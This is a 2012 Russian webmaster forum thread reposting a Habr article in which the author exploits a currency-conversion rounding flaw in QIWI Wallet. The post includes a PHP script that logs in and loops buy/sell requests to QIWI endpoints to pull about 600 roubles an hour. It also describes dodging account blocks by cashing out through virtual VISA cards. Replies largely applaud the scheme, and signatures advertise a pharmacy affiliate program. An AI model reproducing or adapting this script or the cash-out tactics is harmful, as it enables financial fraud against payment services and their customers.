АРМАДА
Разоряем QIWI, деньги из воздуха
На страницу 1, 2  След.
Новая тема Написать ответ

adamant
V.I.P.
Зарегистрирован: 20.03.2008
Сообщений: 11494
Обратиться по нику
# Добавлено:Сб Dec 15, 2012 7:30 pmДобавить в избранноеОтветить с цитатой
статья только что выпилена с http://habrahabr.ru/post/162693/
киви побыстрому законопатила щелку, чтобы не майнили с буржуя, в то время как буржуй продолжает стричь гешефт с лохов^Wклиентов .

Вступление
Неделю назад мною была найдена забавная ошибка на сайте QIWI, точнее на новой версии сайта VISA QIWI WALLET.

Когда QIWI запускали новую версию сайта, они добавили пару сервисов, такие как:

создание счетов в различных валютах (RUB, EUR, USD)
переводы между счетами из одной валюты в другую



В переводах между счетами таилась фатальная ошибка, подробнее под катом.


Обнаружение

6 декабря мне понадобилось оплатить некую услугу через QIWI-кошелёк. Зайдя на сайт QIWI я впервые увидел обновленный интерфейс, который по начале меня порадовал, а в последствие немного огорчил, потому что я не смог найти, как пополнить свой кошелёк. В итоге просто попросил знакомого перевести мне со своего QIWI-кошелька.

Разобравшись со своими делами, я полез осваивать обновленный интерфейс. Увидев возможность создавать счета, тут же создал счета во всех возможных валютах (USD, EUR, KZR, RUB). После сего действия, меня заинтересовала возможность перевода из одной валюты в другую



Моя кошерная любовь к деньгам тут же настроила мозг на поиск халявы. Буквально за пять минут я заметил забавную особенность, которая позволяла получать (за одну операцию) 14 копеек из воздуха.
Тут мы покупаем 0.03 EUR за 1.23 RUB



А тут мы продаём 0.03 EUR за 1.37 RUB



Попробовав купить-продать 0,03 EUR несколько раз, понял, что ошибка действительно имеет место быть и что мой счёт пополнился на пару рублей. Сразу на ум пришла пословица «копейка рубль бережет».

Эксплуатирование

Осторожно — быдлокод
Зная, как работает техподдержка QIWI (можно месяцы дожидаться ответа, причем не факт, что ответ будет полезен), решил не заморачиваться попытками достучаться туда и решил немножко попользоваться 'фичей'. Понимая, что вручную по 14 копеек за операцию я многое не получу, в скоростном режиме набыдлокодил скрипт (на PHP, ибо больше ничего не знаю), который:

покупает 0,99 EUR за 40,59 RUB
33 раза продает 0,09 EUR по 1,37 RUB


В итоге тратим 40,59 RUB, а получаем 45,21 RUB.

Код:
function get_t($cookie)
{
   //получаем идентификатор операции
   preg_match('|\"t\":\"(.*?)\"|', curl('https://w.qiwi.com/user/person/account/transfer.action', $cookie), $tmp);
   return $tmp[1];
}

$number = '';
$password = '';

//авторизация
preg_match('|Set-Cookie: (.*?);|', curl('https://w.qiwi.com/auth/login.action?source=MENU&login=%2B'.$number.'&password='.$password, null, array('Accept: application/json, text/javascript, */*; q=0.01', 'X-Requested-With: XMLHttpRequest')), $tmp);
$cookies = $tmp[1];

//бесконечная работа, естественно
while (true)
{
   $t = get_t($cookies);
   //покупаем 0,99 EUR за 40,59 RUB (1.23 * 33)
   curl('https://w.qiwi.com/user/person/account/state.action?extra%5B\'account\'%5D='.$number.'&source=qiwi_RUB¤cy=EUR&amountInteger=0&amountFraction=99­&state=CONFIRM&t='.$t.'&protected=true', $cookies);
   //подтверждение покупки
   curl('https://w.qiwi.com/payment/form/state.action?state=PAY&t='.$t, $cookies);
   
   //33 запроса на продажу 0,03 EUR
   for ($i=0; $i<33; $i++)
   {
      $t = get_t($cookies);
      //33 раза продаём 0,03 EUR по 1,37 RUB (45,21)
      curl('https://w.qiwi.com/user/person/account/state.action?extra%5B\'account\'%5D='.$number.'&source=qiwi_EUR¤cy=RUB&amountInteger=1&amountFraction=37&s­tate=CONFIRM&t='.$t.'&protected=true', $cookies);
      curl('https://w.qiwi.com/payment/form/state.action?state=PAY&t='.$t, $cookies);
   }
}

function curl($url, $cookie = false, $httpheaders = false)
{
   ..
}



Этот простейший скрипт позволял извлекать из воздуха около 10 рублей в минуту => 600 рублей в час.

Действия со стороны QIWI

Изначально деньги с кошелька можно было тратить куда угодно (хоть напрямую переводы на банковскую карту), в последствие QIWI начали блокировать аккаунты (да, мне не хватало одного аккаунта), блокировали операции (моментально распознавались антифрод системой), но сам баг(?) не исправляли.

В последствие было выявлено, что можно создать виртуальную карту VISA и постепенно (по мере накопления денежных средств) сбрасывать на неё деньги, ведь при блокировке аккаунта виртуальная карточка не блокировалась Very Happy

Итог

Заблокировано около 30 аккаунтов, получено море веселья и удовольствия (у меня особые чувства к подобным вещам), для себя ещё раз подтвердил, что какой бы крупной не была кампания, мелкие ошибки (с крупными последствиями) всегда можно найти Very Happy

На данный момент подобное провернуть уже нельзя, хотя QIWI при высчитывание стоимости конвертации валюты показывает старые значения.

Надеюсь QIWI на меня не в обиде.

Не особо умею писать статьи, простите за недочёты.
Не могу писать в «платёжные системы», увы.
(c) Diabllo
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port |

shhef +
V.I.P.
Зарегистрирован: 14.09.2007
Сообщений: 7694
Обратиться по нику
# Добавлено:Сб Dec 15, 2012 7:46 pmОтветить с цитатой
:thup: вебмани когда то тоже так лажанул в 2008... правда не долго :mrrgreen:
Облачный сервер за 5 у.е. + 10 у.е на счет при регистрации по моей ссылке. Разные страны! Лучший треккер!

Yabuti
V.I.P.
Зарегистрирован: 28.11.2008
Сообщений: 16263
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Сб Dec 15, 2012 7:59 pmОтветить с цитатой
Классный способ! :thup:
Вроде серьезная контора, а такие промахи допускает Smile
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
--

DrKronos
SEO-доктор
Зарегистрирован: 11.03.2008
Сообщений: 13024
Moder (Сумма: 1)
Обратиться по нику
# Добавлено:Сб Dec 15, 2012 8:06 pmОтветить с цитатой
И уже не первый раз. Была еще тема с переводом из/в ТКС в/из Киви.
Oscar the grouch Здесь могла быть ваша реклама

Hello_Kitty
V.I.P.
Зарегистрирован: 30.04.2007
Сообщений: 10763
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 4:37 amОтветить с цитатой
И почему такие интересные и полезные статьи выпиливают с хабра? :ks:

adamant
V.I.P.
Зарегистрирован: 20.03.2008
Сообщений: 11494
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 5:40 amОтветить с цитатой
нам то трафик будет))) гуглохабраэфект :mrrgreen:
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port |

JM
Гуру
Зарегистрирован: 25.08.2006
Сообщений: 1382
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 7:27 amОтветить с цитатой
на хабре уже прикрыли Wink
Конвертит мобильный траф как зверь!!!
VDS и домены от AHnames.com - лучшие решения по доступным ценам

Yabuti
V.I.P.
Зарегистрирован: 28.11.2008
Сообщений: 16263
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 8:19 amОтветить с цитатой
через мобильную версию можно смотреть: http://m.habrahabr.ru/post/162693/ :thup:
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
--

JM
Гуру
Зарегистрирован: 25.08.2006
Сообщений: 1382
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 8:25 amОтветить с цитатой
Лол Smile еще и баг на хабре? Smile
Конвертит мобильный траф как зверь!!!
VDS и домены от AHnames.com - лучшие решения по доступным ценам

Hello_Kitty
V.I.P.
Зарегистрирован: 30.04.2007
Сообщений: 10763
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 8:50 amОтветить с цитатой
Особо порадовали восторженные комменты там, и все они по поводу того что можно комментить в заблоченную статью. :mrrgreen: Хабравчанам так мало надо для счастья оказывается.

Orvas
I have never been clever
Зарегистрирован: 26.03.2008
Сообщений: 3613
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 9:11 amОтветить с цитатой
Интересно, сколько он успел увести у них.

Longer
V.I.P.
Зарегистрирован: 09.10.2007
Сообщений: 2782
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 9:41 amОтветить с цитатой
Классно :thup:

Признавайтесь, кто на других системах уже обменники дрочит?
Серверы и XEN ВПС с бесплатным 24/7 Администрированием
Превосходное решение для мобильного трафика. Мысли глобально - лей на Bizzclick!

awm543322445
V.I.P.
Зарегистрирован: 31.05.2012
Сообщений: 7303
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 2:40 pmОтветить с цитатой
Когда то и у визы была уязвимость :oldher:
Сторонникам Морали и Нравственности нужно немедленно отрезать хуй, потому что хуй -- это безнравственно.

Inquisitor
Инквизицию никто не ждет
Зарегистрирован: 04.12.2007
Сообщений: 1971
Обратиться по нику
# Добавлено:Вс Dec 16, 2012 4:08 pmОтветить с цитатой
обнаружили и закрыли! Акки локнули, если бы не локнули, откатили бы назад транзы. Когда бизнес начинает беднеть все сразу это увидят.

nadkhachaturova
Свой
Зарегистрирован: 21.10.2012
Сообщений: 60
Обратиться по нику
# Добавлено:Вт Dec 18, 2012 1:53 pmОтветить с цитатой
Интересно, а мне недавно письмо приходило с фишинга QIWI. Написала в хост, на котором сайт замаскирован. Там DDoS атака была, вроде, не суть. Косят-то под киви, но на таких лохов рассчитывают! Даже логотип киви не похож - как будто топором вырублен кружлчек желтый.
Статьи для сайтов на заказ, статьи со ссылками
Новая тема Написать ответ    ГЛАВНАЯ ~ ФИНАНСОВЫЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры